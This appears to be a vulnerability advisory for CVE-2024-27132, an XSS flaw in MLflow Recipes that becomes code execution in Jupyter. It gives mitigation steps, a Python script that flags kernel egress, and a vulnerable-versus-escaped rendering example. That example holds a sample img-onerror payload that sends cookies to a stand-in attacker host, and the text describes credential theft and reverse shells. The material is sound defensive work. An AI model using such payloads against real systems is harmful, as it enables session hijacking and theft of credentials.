CVE-2024-27132: MLflow: XSS in recipes enables client-side RCE
CRITICAL. PoC available. CISA SSVC decision: Attend.
MLflow recipe execution in Jupyter Notebook can lead to client-side RCE via unsanitized template variables: no credentials are required, only user interaction (running the recipe). Any team running shared or third-party MLflow recipes risks full environment compromise, including model weights, training data, and cloud credentials. Patch immediately, or prohibit untrusted recipe execution until the fix is deployed.
What is the risk?
Critical for ML operations teams. The CVSS 9.6 score reflects a network-reachable vector, low attack complexity, no privileges required, and high impact on confidentiality, integrity, and availability, with a scope change because the payload escapes the MLflow component into the notebook session. JavaScript that runs in the notebook's origin can use the notebook's own kernel API, so the XSS becomes Python execution with the full OS permissions of the Jupyter user on the ML engineer's workstation or server. Because no privileges are required, any recipe distributed via GitHub, internal wikis, or social engineering is a viable attack vector, and MLflow's widespread adoption in enterprise ML pipelines expands the blast radius.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| MLflow | pip | versions before the fix in PR #10873 (exact range not listed here) | fix merged in PR #10873 (release version not listed here) |
If you run MLflow Recipes on a build without that fix and execute recipes you did not author or review, you are affected.
What should I do?
Six steps:
- Patch: Upgrade MLflow to a version that includes PR #10873.
- Audit: Inventory all MLflow instances and identify those using the Recipes feature.
- Restrict: Block execution of untrusted or unreviewed recipes; enforce recipe code review gates before team-wide adoption.
- Isolate: Run Jupyter and MLflow environments in containers with minimal OS permissions and no direct access to production credentials; use IAM roles or workload identity instead of stored keys.
- Detect: Monitor for unexpected outbound network connections or anomalous file access originating from Jupyter processes.
- Rotate credentials: For any environment where untrusted recipes may have been executed, rotate cloud provider credentials, API keys, and service account tokens immediately.
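The "Detect" step above says to watch for unexpected outbound connections from Jupyter processes. The following is an added example, not part of the original advisory or of MLflow, showing one way to do that on a Linux host: it correlates established TCP connections with the processes that own them and flags any connection made by a Jupyter kernel, or by a child of one such as a spawned shell, to a peer outside an allowlist. The `ss -tnp` and `ps -eo pid,ppid,args` text is constructed sample output, and the allowlist (`ALLOWED_PEERS`, an internal range holding the MLflow tracking server) is a hypothetical site policy.

```python
"""Flag outbound connections from Jupyter kernels (or their descendants) to
non-allowlisted peers. Added example; inputs below are constructed samples."""
import re
from ipaddress import ip_address, ip_network

# Hypothetical site policy: internal range where the MLflow tracking server lives.
ALLOWED_PEERS = [ip_network("10.20.0.0/16")]

# Constructed sample of `ss -tnp` taken right after a recipe was run in a notebook.
SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port   Process
ESTAB  0      0      10.20.0.15:51234    10.20.0.40:5000     users:(("python3",pid=4242,fd=21))
ESTAB  0      0      10.20.0.15:51240    203.0.113.7:443     users:(("python3",pid=4242,fd=23))
ESTAB  0      0      10.20.0.15:51300    10.20.0.40:5000     users:(("python3",pid=4300,fd=9))
ESTAB  0      0      10.20.0.15:51310    198.51.100.9:4444   users:(("bash",pid=4311,fd=3))
"""

# Constructed sample of `ps -eo pid,ppid,args` for the same host.
PS_OUTPUT = """\
  PID  PPID COMMAND
 4100     1 /usr/bin/python3 /usr/local/bin/jupyter-lab
 4242  4100 /usr/bin/python3 -m ipykernel_launcher -f /run/user/1000/jupyter/kernel-a1.json
 4300     1 /usr/bin/python3 /opt/mlflow/bin/mlflow server --host 0.0.0.0 --port 5000
 4311  4242 bash -i
"""

# Matches an established connection line and captures peer address, owning
# process name and pid from the users:(("comm",pid=N,fd=M)) column.
_SS_LINE = re.compile(
    r'^ESTAB\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<peer>\S+)\s+'
    r'users:\(\("(?P<comm>[^"]+)",pid=(?P<pid>\d+)'
)


def parse_ss(text):
    """Return (pid, comm, peer_host, peer_port) for each established connection."""
    conns = []
    for line in text.splitlines():
        m = _SS_LINE.match(line.strip())
        if not m:
            continue
        host, port = m.group("peer").rsplit(":", 1)
        conns.append((int(m.group("pid")), m.group("comm"), host.strip("[]"), int(port)))
    return conns


def parse_ps(text):
    """Return {pid: (ppid, args)} from `ps -eo pid,ppid,args` output (header skipped)."""
    procs = {}
    for line in text.splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) == 3:
            procs[int(parts[0])] = (int(parts[1]), parts[2])
    return procs


def descends_from_kernel(pid, procs):
    """True if pid is an ipykernel process or has one as an ancestor
    (catches a reverse shell spawned from the kernel)."""
    seen = set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        ppid, args = procs[pid]
        if "ipykernel_launcher" in args:
            return True
        pid = ppid
    return False


def find_suspicious_connections(ss_text, ps_text, allowed=ALLOWED_PEERS):
    """Connections from kernel-descended processes to peers outside the allowlist."""
    procs = parse_ps(ps_text)
    hits = []
    for pid, comm, host, port in parse_ss(ss_text):
        try:
            peer = ip_address(host)
        except ValueError:
            continue  # not a literal address; leave for another check
        if any(peer in net for net in allowed):
            continue
        if descends_from_kernel(pid, procs):
            hits.append((pid, comm, host, port))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_connections(SS_OUTPUT, PS_OUTPUT):
        print("suspicious kernel egress: pid=%d comm=%s peer=%s:%d" % hit)
```

On the sample above the kernel's connection to the tracking server passes, while its connection to 203.0.113.7:443 and the `bash -i` child's connection to 198.51.100.9:4444 are both flagged. In production, feed the same logic from periodic `ss`/`ps` snapshots or from an EDR's process and network telemetry, and keep the allowlist narrow: a kernel that legitimately needs PyPI or a model hub should go through a proxy that is itself on the list.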
What does CISA's SSVC say?
Decision: Attend. Source: CISA Vulnrichment (SSVC v2.0), using the CISA Coordinator decision tree.
Frequently Asked Questions
What is CVE-2024-27132?
A cross-site scripting flaw in MLflow Recipes: template variables in a recipe are rendered into notebook output without sanitization, so running an untrusted recipe in Jupyter Notebook executes attacker-supplied JavaScript in the notebook and, from there, arbitrary code on the host with the user's permissions. No credentials are needed, only that someone runs the recipe.
Is CVE-2024-27132 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2024-27132, increasing the risk of exploitation.
How to fix CVE-2024-27132?
Upgrade MLflow to a version that includes PR #10873. Until that is deployed: inventory MLflow instances that use Recipes, block untrusted or unreviewed recipes behind a code review gate, run Jupyter and MLflow in containers with minimal permissions and workload identity instead of stored keys, monitor Jupyter processes for unexpected outbound connections or file access, and rotate cloud credentials, API keys, and service account tokens wherever an untrusted recipe may already have run.
What systems are affected by CVE-2024-27132?
This vulnerability affects the following AI/ML architecture patterns: training pipelines, ML experiment tracking, MLOps platforms, Jupyter-based ML workflows, model registries.
What is the CVSS score for CVE-2024-27132?
CVE-2024-27132 has a CVSS v3.1 base score of 9.6 (CRITICAL). The EPSS exploitation probability is 0.87%.
What is the AI security impact?
Affected AI Architectures
- Training pipelines, ML experiment tracking, MLOps platforms, Jupyter-based ML workflows, model registries
MITRE ATLAS Techniques
- AML.T0010.001 AI Software
- AML.T0011 User Execution
- AML.T0011.000 Unsafe AI Artifacts
- AML.T0025 Exfiltration via Cyber Means
- AML.T0049 Exploit Public-Facing Application
What are the technical details?
Original Advisory
Insufficient sanitization in MLflow leads to XSS when running an untrusted recipe. This issue leads to a client-side RCE when running an untrusted recipe in Jupyter Notebook. The vulnerability stems from lack of sanitization over template variables.
Exploitation Scenario
An adversary crafts a malicious MLflow recipe whose template variables (for example, a value in the recipe's YAML configuration or a step definition) contain a JavaScript payload. The recipe is distributed via a public GitHub repository, an internal Confluence page, or a Slack message to the ML team. An ML engineer clones the recipe and runs it in Jupyter Notebook. The unsanitized template variable is rendered into the notebook's HTML output, so the attacker's JavaScript executes in the notebook's browser origin with the engineer's authenticated Jupyter session. From there it escalates to client-side RCE: the script can drive the notebook's kernel to execute arbitrary Python, which reads environment variables such as AWS_ACCESS_KEY_ID and OPENAI_API_KEY, exfiltrates model artifacts or training data to an attacker-controlled endpoint, or plants a reverse shell in the ML pipeline scripts, all while the engineer sees what looks like a normal recipe run.
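To make the scenario concrete, here is an added example, written for this page and not taken from MLflow's code, of the vulnerable pattern beside its hardened form, plus the pre-execution review gate the "Restrict" step calls for. The `{{ VAR }}` substitution, the `CARD_TEMPLATE` HTML, and the profile values are hypothetical stand-ins for the recipe/profile rendering path; the payload in `MALICIOUS_PROFILE` is a constructed sample.

```python
"""Vulnerable vs. hardened rendering of recipe template variables, and a review
gate that rejects recipes carrying markup. Added example with constructed data."""
import html
import re

# Constructed sample: profile values as an attacker-controlled recipe repo would
# ship them. `experiment_name` carries the payload; it needs no <script> tag,
# an event handler on an <img> is enough once the value lands in notebook HTML.
MALICIOUS_PROFILE = {
    "experiment_name": '<img src=x onerror="fetch(\'https://attacker.invalid/?c=\'+document.cookie)">',
    "target_col": "fare_amount",
}

# Hypothetical recipe step card with {{ VAR }} placeholders, the kind of HTML a
# recipe step hands to the notebook for display.
CARD_TEMPLATE = (
    "<div class='step-card'>"
    "<h3>Experiment: {{ experiment_name }}</h3>"
    "<p>Target column: {{ target_col }}</p>"
    "</div>"
)

_PLACEHOLDER = re.compile(r"\{\{\s*(\w+)\s*\}\}")


def render_card_unsafe(template, profile):
    """Vulnerable (CWE-79): profile values are interpolated verbatim into HTML,
    so markup in a value is parsed by the browser and its script runs."""
    return _PLACEHOLDER.sub(lambda m: str(profile[m.group(1)]), template)


def render_card_safe(template, profile):
    """Hardened: each substituted value is HTML-entity encoded for the HTML body
    context, so markup in a profile renders as inert text."""
    return _PLACEHOLDER.sub(
        lambda m: html.escape(str(profile[m.group(1)]), quote=True), template
    )


# Review gate for the "Restrict" step: tags, javascript: URLs and on*= handlers
# have no business in a recipe profile value, so flag them before anyone runs
# the recipe in a notebook.
_MARKUP = re.compile(r"<\s*/?\s*[a-zA-Z]|javascript\s*:|\bon[a-z]+\s*=", re.IGNORECASE)


def suspicious_profile_keys(profile):
    """Return the profile keys whose values contain HTML/JS markup."""
    return [k for k, v in profile.items() if isinstance(v, str) and _MARKUP.search(v)]


if __name__ == "__main__":
    print("unsafe:", render_card_unsafe(CARD_TEMPLATE, MALICIOUS_PROFILE))
    print("safe:  ", render_card_safe(CARD_TEMPLATE, MALICIOUS_PROFILE))
    print("review gate flags:", suspicious_profile_keys(MALICIOUS_PROFILE))
```

Escaping is the real fix and belongs at the point where the value is written into HTML; the review gate is a compensating control for the window before the patched build is deployed, and it should be treated as a tripwire for human review rather than a complete filter, since context-specific encodings (attributes, URLs, JavaScript) need the escaping rules the CWE text below describes.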
Weaknesses (CWE)
CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
- [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
- [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the HTML body, an element attribute (such as src="XYZ"), a URI, a JavaScript section, or a Cascading Style Sheet. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
References
- github.com/mlflow/mlflow/pull/10873 (issue and patch)
- research.jfrog.com/vulnerabilities/mlflow-untrusted-recipe-xss-jfsa-2024-000631930/ (third-party research with exploit details)
- github.com/fkie-cad/nvd-json-data-feeds (NVD CVE data feed mirror; reference data, not exploit code)
- github.com/jfrog/jupyterlab-xssguard (JFrog's JupyterLab XSS guard extension; defensive tooling, not exploit code)
Related Vulnerabilities
- CVE-2025-15379 (10.0) MLflow: RCE via unsanitized model dependency specs (same package: mlflow)
- CVE-2023-3765 (10.0) MLflow: path traversal allows arbitrary file read (same package: mlflow)
- CVE-2026-2635 (9.8) mlflow: security flaw enables exploitation (same package: mlflow)
- CVE-2023-2780 (9.8) MLflow: path traversal allows arbitrary file read/write (same package: mlflow)
- CVE-2023-1177 (9.8) MLflow: path traversal allows arbitrary file read/write (same package: mlflow)